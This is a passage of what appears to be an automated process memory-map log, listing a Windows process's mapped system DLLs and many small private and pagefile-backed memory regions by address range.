4412 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4413 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4414 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4415 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4416 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4417 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4418 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4419 start_va = 0xb70000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 4420 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4421 start_va = 0xcd0000 end_va = 0xe57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 4422 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4423 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4424 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4425 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4426 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4427 start_va = 0xe60000 end_va = 0xfe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 4428 start_va = 0xff0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 4430 start_va = 0x220000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4431 start_va = 0x300000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4432 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4433 start_va = 0x220000 end_va = 0x264fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4434 start_va = 0x220000 end_va = 0x221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4435 start_va = 0x220000 end_va = 0x221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4436 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4437 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4438 start_va = 0x753f0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753f1120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 4439 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4440 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4441 start_va = 0xb70000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 4442 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4443 start_va = 0x23f0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 4444 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4445 start_va = 0x24f0000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 4446 start_va = 0x24f0000 end_va = 0x25cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024f0000" filename = "" Region: id = 4447 start_va = 0x2630000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 4448 start_va = 0x2670000 end_va = 0x293efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4449 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4450 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4451 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 4452 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 4453 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 4454 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 4455 start_va = 0x360000 end_va = 0x360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4456 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4457 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 4458 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 4459 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 4460 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 4461 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4462 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4463 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 4464 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4465 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4466 start_va = 0xa70000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 4467 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4468 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 4469 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 4470 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 4471 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 4472 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 4473 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4474 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 4475 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 4476 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 4477 start_va = 0xa50000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 4478 start_va = 0xa60000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 4479 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 4480 start_va = 0xc20000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4481 start_va = 0xb80000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 4482 start_va = 0xb90000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 4483 start_va = 0xba0000 end_va = 0xba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4484 start_va = 0xbb0000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 4485 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 4486 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 4487 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 4488 start_va = 0xbf0000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 4489 start_va = 0xc00000 end_va = 0xc00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 4490 start_va = 0xc10000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 4491 start_va = 0xc60000 end_va = 0xc60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4492 start_va = 0xc70000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 4493 start_va = 0xc80000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 4494 start_va = 0xc90000 end_va = 0xc90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 4495 start_va = 0xca0000 end_va = 0xca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 4496 start_va = 0xcb0000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 4497 start_va = 0x25d0000 end_va = 0x25d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 4498 start_va = 0x25e0000 end_va = 0x25e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 4499 start_va = 0x25f0000 end_va = 0x25f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 4500 start_va = 0x2600000 end_va = 0x2600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 4501 start_va = 0x2610000 end_va = 0x2610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 4502 start_va = 0x2620000 end_va = 0x2620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 4503 start_va = 0x2940000 end_va = 0x2940fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 4504 start_va = 0x2950000 end_va = 0x2950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 4505 start_va = 0x2960000 end_va = 0x2960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 4506 start_va = 0x2970000 end_va = 0x2970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 4507 start_va = 0x2980000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 4508 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 4509 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 4510 start_va = 0x29b0000 end_va = 0x29b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 4511 start_va = 0x29c0000 end_va = 0x29c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 4512 start_va = 0x29d0000 end_va = 0x29d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 4513 start_va = 0x29e0000 end_va = 0x29e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 4514 start_va = 0x29f0000 end_va = 0x29f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 4515 start_va = 0x2a00000 end_va = 0x2a00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 4516 start_va = 0x2a10000 end_va = 0x2a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 4517 start_va = 0x2a20000 end_va = 0x2a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 4518 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 4519 start_va = 0x2a40000 end_va = 0x2a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 4520 start_va = 0x2a50000 end_va = 0x2a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 4521 start_va = 0x2a60000 end_va = 0x2a60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 4522 start_va = 0x2a70000 end_va = 0x2a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 4523 start_va = 0x2a80000 end_va = 0x2a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 4524 start_va = 0x2a90000 end_va = 0x2a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 4525 start_va = 0x2aa0000 end_va = 0x2aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 4526 start_va = 0x2ab0000 end_va = 0x2ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 4527 start_va = 0x2ac0000 end_va = 0x2ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 4528 start_va = 0x2ad0000 end_va = 0x2ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 4529 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 4530 start_va = 0x2af0000 end_va = 0x2af0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 4531 start_va = 0x2b00000 end_va = 0x2b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4532 start_va = 0x2b10000 end_va = 0x2b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 4533 start_va = 0x2b20000 end_va = 0x2b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 4534 start_va = 0x2b30000 end_va = 0x2b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 4535 start_va = 0x2b40000 end_va = 0x2b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 4536 start_va = 0x2b50000 end_va = 0x2b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 4537 start_va = 0x2b60000 end_va = 0x2b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 4538 start_va = 0x2b70000 end_va = 0x2b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 4539 start_va = 0x2b80000 end_va = 0x2b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 4540 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 4541 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 4542 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 4543 start_va = 0x2bc0000 end_va = 0x2bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 4544 start_va = 0x2bd0000 end_va = 0x2bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 4545 start_va = 0x2be0000 end_va = 0x2be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 4546 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 4547 start_va = 0x2c00000 end_va = 0x2c00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4548 start_va = 0x2c10000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 4549 start_va = 0x2c20000 end_va = 0x2c20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 4550 start_va = 0x2c30000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 4551 start_va = 0x2c40000 end_va = 0x2c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 4552 start_va = 0x2c50000 end_va = 0x2c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 4553 start_va = 0x2c60000 end_va = 0x2c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 4554 start_va = 0x2c70000 end_va = 0x2c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 4555 start_va = 0x2c80000 end_va = 0x2c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 4556 start_va = 0x2c90000 end_va = 0x2c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 4557 start_va = 0x2ca0000 end_va = 0x2ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 4558 start_va = 0x2cb0000 end_va = 0x2cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 4559 start_va = 0x2cc0000 end_va = 0x2cc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 4560 start_va = 0x2cd0000 end_va = 0x2cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 4561 start_va = 0x2ce0000 end_va = 0x2ce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 4562 start_va = 0x2cf0000 end_va = 0x2cf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 4563 start_va = 0x2d00000 end_va = 0x2d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4564 start_va = 0x2d10000 end_va = 0x2d10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 4565 start_va = 0x2d20000 end_va = 0x2d20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 4566 start_va = 0x2d30000 end_va = 0x2d30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 4567 start_va = 0x2d40000 end_va = 0x2d40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 4568 start_va = 0x2d50000 end_va = 0x2d50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 4569 start_va = 0x2d60000 end_va = 0x2d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 4570 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 4571 start_va = 0x2d80000 end_va = 0x2d80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 4572 start_va = 0x2d90000 end_va = 0x2d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 4573 start_va = 0x2da0000 end_va = 0x2da0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 4574 start_va = 0x2db0000 end_va = 0x2db0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 4575 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 4576 start_va = 0x2dd0000 end_va = 0x2dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 4577 start_va = 0x2de0000 end_va = 0x2de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 4578 start_va = 0x2df0000 end_va = 0x2df0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 4579 start_va = 0x2e00000 end_va = 0x2e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 4580 start_va = 0x2e10000 end_va = 0x2e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 4581 start_va = 0x2e20000 end_va = 0x2e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 4582 start_va = 0x2e30000 end_va = 0x2e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 4583 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 4584 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 4585 start_va = 0x2e60000 end_va = 0x2e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 4586 start_va = 0x2e70000 end_va = 0x2e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 4587 start_va = 0x2e80000 end_va = 0x2e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 4588 start_va = 0x2e90000 end_va = 0x2e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 4589 start_va = 0x2ea0000 end_va = 0x2ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 4590 start_va = 0x2eb0000 end_va = 0x2eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 4591 start_va = 0x2ec0000 end_va = 0x2ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 4592 start_va = 0x2ed0000 end_va = 0x2ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 4593 start_va = 0x2ee0000 end_va = 0x2ee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 4594 start_va = 0x2ef0000 end_va = 0x2ef0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 4595 start_va = 0x2f00000 end_va = 0x2f00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4596 start_va = 0x2f10000 end_va = 0x2f10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 4597 start_va = 0x2f20000 end_va = 0x2f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 4598 start_va = 0x2f30000 end_va = 0x2f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 4599 start_va = 0x2f40000 end_va = 0x2f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 4600 start_va = 0x2f50000 end_va = 0x2f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 4601 start_va = 0x2f60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 4602 start_va 